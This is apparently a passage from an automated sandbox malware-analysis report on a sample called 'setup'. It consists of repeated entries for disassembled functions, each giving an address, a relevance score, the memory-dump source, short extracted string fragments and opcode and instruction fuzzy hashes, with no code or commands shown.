                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $^]$qs$y{
                                                                                                                                                                                                                                  • API String ID: 0-2725401534
                                                                                                                                                                                                                                  • Opcode ID: c6a27458d328edd11bb53946f67b854cbaab20696cb99b0e06536be1e37df189
                                                                                                                                                                                                                                  • Instruction ID: a72d0a7eaf78a21db30231a6f90f934dcf2d61897677f727d71e1d3fe77606ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6a27458d328edd11bb53946f67b854cbaab20696cb99b0e06536be1e37df189
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8D1387664C3904BD325CF6984917EFBBE2AFC1314F1CC96CE4E58B245D639D90A8B82
                                                                                                                                                                                                                                  Function 007CE2CB Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: N.L$'$$2F.D$Iv
                                                                                                                                                                                                                                  • API String ID: 0-3473471533
                                                                                                                                                                                                                                  • Opcode ID: 7049c1e76ac9c66c961d113cdb09567056ec9c755dab5ad184fa34e70ad6b615
                                                                                                                                                                                                                                  • Instruction ID: f59a25be25a7a36892a137ccc57eb46a4887ed548a4b455d7aaf12aee698808d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7049c1e76ac9c66c961d113cdb09567056ec9c755dab5ad184fa34e70ad6b615
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7951CDB164C3909FD309DFAA9855A2FFBE2ABD1304F548C5CF0D58B245C638C6098B57
                                                                                                                                                                                                                                  Function 007BF001 Relevance: 4.4, Strings: 3, Instructions: 603COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: iPSZ$no_s${=C
                                                                                                                                                                                                                                  • API String ID: 0-605875136
                                                                                                                                                                                                                                  • Opcode ID: b7dabdc852ea727472455d81f081fc4f1e70d080c5f6d0dd54130c4698848933
                                                                                                                                                                                                                                  • Instruction ID: 064eac7cb5c25f9a926787267662eb374d3b4319f6de9aa24a58ec388da16231
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7dabdc852ea727472455d81f081fc4f1e70d080c5f6d0dd54130c4698848933
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24029EB414D3C58BD3368F2998947EBBFE0AF97704F184AACD4E94B242C7790506CB66
                                                                                                                                                                                                                                  Function 007CE8CD Relevance: 4.2, Strings: 3, Instructions: 408COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: /,$KH$b
                                                                                                                                                                                                                                  • API String ID: 0-2155755540
                                                                                                                                                                                                                                  • Opcode ID: 9833fc8c0eca8366b76986b3924aad65a2340f45727e9712a310e1f8a09172d5
                                                                                                                                                                                                                                  • Instruction ID: 59e3de27530a93a208dc690e8f5730cb4457af4444001db18d36dbeb0654d579
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9833fc8c0eca8366b76986b3924aad65a2340f45727e9712a310e1f8a09172d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03A1BCB55083018AC724DF28C892B7BB7F2EF91314F189A1CE9D98B391E738D905C796
                                                                                                                                                                                                                                  Function 007DD156 Relevance: 4.1, Strings: 3, Instructions: 387COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 0$zfbv$}i{%
                                                                                                                                                                                                                                  • API String ID: 0-3671949165
                                                                                                                                                                                                                                  • Opcode ID: 4a27bc15ef3028491fd4583de81582aac9d538aa4b35c6489e40dba816702785
                                                                                                                                                                                                                                  • Instruction ID: 85e60f70e176ce2d3a9748c5aeb1f7d5cf868d87c5a96cb12a6a5a522246e9fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a27bc15ef3028491fd4583de81582aac9d538aa4b35c6489e40dba816702785
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FB138226093D18AD339CF2984513B6FBE29BD6354F1D85EED8D98B382C63D9C058762
                                                                                                                                                                                                                                  Function 007BAE4D Relevance: 4.1, Strings: 3, Instructions: 379COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: =$^HY]$hntl
                                                                                                                                                                                                                                  • API String ID: 0-263700783
                                                                                                                                                                                                                                  • Opcode ID: 66bcf6474ac4eb6e704b0d991613846415364bc73f445f4e4ce917322a5171ad
                                                                                                                                                                                                                                  • Instruction ID: ad79843aeac1bc0e31ec3524413f7b6e999bdc25fcb262489f41d96e684a3292
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66bcf6474ac4eb6e704b0d991613846415364bc73f445f4e4ce917322a5171ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15B1F3B250C3409FD318DF25C891AABBBE6ABD1314F04896DE5D68B382DB78C509CB56
                                                                                                                                                                                                                                  Function 007BFCC5 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: !$OQJ>$RQJ>
                                                                                                                                                                                                                                  • API String ID: 0-3745743227
                                                                                                                                                                                                                                  • Opcode ID: bf57af7d27e4d529f8e32b7c3fdc06ece7fd17807a6597af58b02b5fe45d9909
                                                                                                                                                                                                                                  • Instruction ID: 579b760f522436b7d69367f806496ed8a18275e3497ae1d849aa6cc475d35b6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf57af7d27e4d529f8e32b7c3fdc06ece7fd17807a6597af58b02b5fe45d9909
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50513873A483A14BD724CA78CC417EFB6D2AFD5310F1A467DDC98E7345EA784A458382
                                                                                                                                                                                                                                  Function 007B640D Relevance: 3.3, Strings: 2, Instructions: 819COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 0$8
                                                                                                                                                                                                                                  • API String ID: 0-46163386
                                                                                                                                                                                                                                  • Opcode ID: 6675ff7f3609771426062542c8c1aced61ceedd398b5a1dff7a2e748270acf35
                                                                                                                                                                                                                                  • Instruction ID: 1b5aa95450bdbf97925620e17141d0a80b9f808915d066e4770af0496cbcf793
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6675ff7f3609771426062542c8c1aced61ceedd398b5a1dff7a2e748270acf35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E726A716083409FD714CF18C894BABBBE1BF94314F14892DFA9887392D779D958CB92
                                                                                                                                                                                                                                  Function 007B5ADD Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: )$IEND
                                                                                                                                                                                                                                  • API String ID: 0-707183367
                                                                                                                                                                                                                                  • Opcode ID: 18f5fabc71349b159bab190cad3547dff301cdea6abc7218fcca6c81f5217a9a
                                                                                                                                                                                                                                  • Instruction ID: feb184bc97cd860f9b1151531065b223eae94921d14a948b952412e86d5f3c0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18f5fabc71349b159bab190cad3547dff301cdea6abc7218fcca6c81f5217a9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D19DB1508744DFE720DF14C885B9BBBE4EB95304F14492DFA999B381E379E908CB92
                                                                                                                                                                                                                                  Function 007DE8E3 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: AE}B$F!I=
                                                                                                                                                                                                                                  • API String ID: 0-1271975744
                                                                                                                                                                                                                                  • Opcode ID: f2c02f7d3b6712817ee995ab361013b2edd6ab4c50fd097b65cb7e4a8bb3ed18
                                                                                                                                                                                                                                  • Instruction ID: 99dc7466d308f83a0716861282529ab5139bd1d446aa28c34a5e8ee4302f9d3e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2c02f7d3b6712817ee995ab361013b2edd6ab4c50fd097b65cb7e4a8bb3ed18
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECA1F87150C3928BD725CF29C45136ABBF1EFD6300F18C96ED4DA9B386CA759806CB52
                                                                                                                                                                                                                                  Function 007DE9FC Relevance: 2.8, Strings: 2, Instructions: 318COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: AE}B$F!I=
                                                                                                                                                                                                                                  • API String ID: 0-1271975744
                                                                                                                                                                                                                                  • Opcode ID: 6c81db343a9fdb79c8e67fb3b5111bc0464574e9a2686e1102fb9177d0f6e250
                                                                                                                                                                                                                                  • Instruction ID: 993dda312bf6e0bc36d7f78fbb781e84d42b2884e2020ccc2e697726187dc04c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c81db343a9fdb79c8e67fb3b5111bc0464574e9a2686e1102fb9177d0f6e250
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7A10A71508392CBD725CF29C45136ABBF1ABD6300F18C96ED4DA9B386CB799805CB52
                                                                                                                                                                                                                                  Function 007C9474 Relevance: 2.8, Strings: 2, Instructions: 293COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: O016$o
                                                                                                                                                                                                                                  • API String ID: 0-2860071445
                                                                                                                                                                                                                                  • Opcode ID: d83dd61649d98ecb8728194979c85e21a8bdb1ead134e96ba6a71a93091e6098
                                                                                                                                                                                                                                  • Instruction ID: edf3a8d177210b48fc18488e32c67a18a0521a0f0a6b47df578fcfcb54ae1351
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d83dd61649d98ecb8728194979c85e21a8bdb1ead134e96ba6a71a93091e6098
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09A1E4729183128BC328CF28C4917ABB7E1FF94754F194A2DE9C58B391E778D945CB81
                                                                                                                                                                                                                                  Function 007DE9E9 Relevance: 2.8, Strings: 2, Instructions: 292COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: AE}B$F!I=
                                                                                                                                                                                                                                  • API String ID: 0-1271975744
                                                                                                                                                                                                                                  • Opcode ID: 41c10c27d5110fc24821ba59b858711c7034fec238fc9af1002fd7dafa7e88be
                                                                                                                                                                                                                                  • Instruction ID: c437b1f53623028373641e7b6efc592d74cbe78b8cabd9838c5a7a56d4a505e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41c10c27d5110fc24821ba59b858711c7034fec238fc9af1002fd7dafa7e88be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A29106719083928FD324CF29C45176ABBF2AFD6300F18899ED4D99B386CB749806CB52
                                                                                                                                                                                                                                  Function 007DEEC7 Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: AE}B$F!I=
                                                                                                                                                                                                                                  • API String ID: 0-1271975744
                                                                                                                                                                                                                                  • Opcode ID: 9501884a97f9b1228cfc5c5806b8d339f9ca5c0270db1abeb6ffcc64bb630189
                                                                                                                                                                                                                                  • Instruction ID: 9991e13a9c09da91f60162864dd641f163d6ac1f7d0a4414223a04eb370f0dcf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9501884a97f9b1228cfc5c5806b8d339f9ca5c0270db1abeb6ffcc64bb630189
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14910571908392CBD324CF29C45176ABBF2AFD6300F18899ED4D99B386CB749806CB52
                                                                                                                                                                                                                                  Function 007D804D Relevance: 2.8, Strings: 2, Instructions: 283COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: -,#"$t
                                                                                                                                                                                                                                  • API String ID: 0-4244866344
                                                                                                                                                                                                                                  • Opcode ID: d8f7699e884dc5e917eb2aa5f9312ffb1d07b65bb10d29466100b679384a1d34
                                                                                                                                                                                                                                  • Instruction ID: 3935a4c39437002a96142d72eb32e49b80c25ab74a8baf5d98cc45f1c136e940
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8f7699e884dc5e917eb2aa5f9312ffb1d07b65bb10d29466100b679384a1d34
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47814971A053019BD7589E29CC56B3FB6F2EB95310F18C53EE98697384EA3CAC058793
                                                                                                                                                                                                                                  Function 007D9ED6 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ,q>s$HI
                                                                                                                                                                                                                                  • API String ID: 0-980453730
                                                                                                                                                                                                                                  • Opcode ID: 02707259b9aa60e88ea052027358250054af34dc7cb1e4c36d7b6c8987630673
                                                                                                                                                                                                                                  • Instruction ID: 3d424ab667ff33bc8943308350c8bcc84e9a9f04c51326b78e8cddcf875943d7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02707259b9aa60e88ea052027358250054af34dc7cb1e4c36d7b6c8987630673
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2341E0719093169BC320DF58C85126BB7F2FFD6310F188A1DE9998B344E7789511C786
                                                                                                                                                                                                                                  Function 007DF340 Relevance: 2.6, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: {_kE${_kE
                                                                                                                                                                                                                                  • API String ID: 0-2717772715
                                                                                                                                                                                                                                  • Opcode ID: 84507986243de8a63ad646bbc19ba2d3585a88d8a7cfd2393568b185141ac678
                                                                                                                                                                                                                                  • Instruction ID: 4338b2fc09a413479c31c3b3617cd491433907cc975c49a5b645451eff9b3a83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84507986243de8a63ad646bbc19ba2d3585a88d8a7cfd2393568b185141ac678
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB4127711083C18AD729CF35C8617FABBE29BE2300F18857DC1D687386DA3D49468712
                                                                                                                                                                                                                                  Function 007C7F9F Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ^Z $^Z I
                                                                                                                                                                                                                                  • API String ID: 0-2498858677
                                                                                                                                                                                                                                  • Opcode ID: 1e651d9a85ba79e484935614caae60f86a55f72f65cb5a82967b937431b415ab
                                                                                                                                                                                                                                  • Instruction ID: 746c175f54294c4dcd27e8ccbed3ad26fd9251547f77d207cb5f06a2b214477c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e651d9a85ba79e484935614caae60f86a55f72f65cb5a82967b937431b415ab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA117D3191C3418BD718CE34C4A177ABBD1EBA2744F08457DE8C653286CA39894DCBE3
                                                                                                                                                                                                                                  Function 007DDF10 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LNua$N
                                                                                                                                                                                                                                  • API String ID: 0-1541665044
                                                                                                                                                                                                                                  • Opcode ID: b737bd3dd6e32e2df6477e3c3192376af311689c2f59e612a5a63c000a4ee03d
                                                                                                                                                                                                                                  • Instruction ID: 5866b8a2632344a2c7a823564299d24f83d5941d4f8d7acab8b6dfeb0acb0f51
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b737bd3dd6e32e2df6477e3c3192376af311689c2f59e612a5a63c000a4ee03d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8211C865B093814BD72C8F36856237ABBA36BD6204F2DE57E80D7CB2C6CD7888028715
                                                                                                                                                                                                                                  Function 007CB70D Relevance: 2.5, Strings: 1, Instructions: 1297COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: i
                                                                                                                                                                                                                                  • API String ID: 0-324635982
                                                                                                                                                                                                                                  • Opcode ID: 3e467fbd2cb150ad22e9e63a58ac5a9088465647a240849783bea301ba73d564
                                                                                                                                                                                                                                  • Instruction ID: d857c420919265d791f83513a81ae0f0c890b6982e3ead5b34a533ad1fc0d481
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e467fbd2cb150ad22e9e63a58ac5a9088465647a240849783bea301ba73d564
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48926975A09350ABE724CF28C851F3BBBD1ABEA700F19842CF9C597245D779EC058B92
                                                                                                                                                                                                                                  Function 007DDFDD Relevance: 1.9, Strings: 1, Instructions: 611COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: b
                                                                                                                                                                                                                                  • API String ID: 0-1908338681
                                                                                                                                                                                                                                  • Opcode ID: cae4fa0488f72d8b28949650e9725e27e5330166d57be1caba6830a9a7339915
                                                                                                                                                                                                                                  • Instruction ID: 60a97da3cf72856e6cdd55afdcdd63893b50fb46cbe93d887c990e0d2f0eff0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cae4fa0488f72d8b28949650e9725e27e5330166d57be1caba6830a9a7339915
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F1867050C3C18AE729CF29945176AFFE1AFD7304F18896EE0D99B392DB798406CB16
                                                                                                                                                                                                                                  Function 007D3A4D Relevance: 1.7, Strings: 1, Instructions: 487COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ur
                                                                                                                                                                                                                                  • API String ID: 0-2912587612
                                                                                                                                                                                                                                  • Opcode ID: 4efa4569bd3a5c0dba7008556656262b3bc0a59d730bb062ace27457da15e402
                                                                                                                                                                                                                                  • Instruction ID: 4ef4631f7a20b49726f5eb1a0a0ddbff54d7760d52cfabd7992e1ec6a88ebd8e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4efa4569bd3a5c0dba7008556656262b3bc0a59d730bb062ace27457da15e402
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49D124B2A152118BD714DF28CC8176BB3F2EF95310F08853EE996DB385E67CDA058762
                                                                                                                                                                                                                                  Function 007EB09D Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
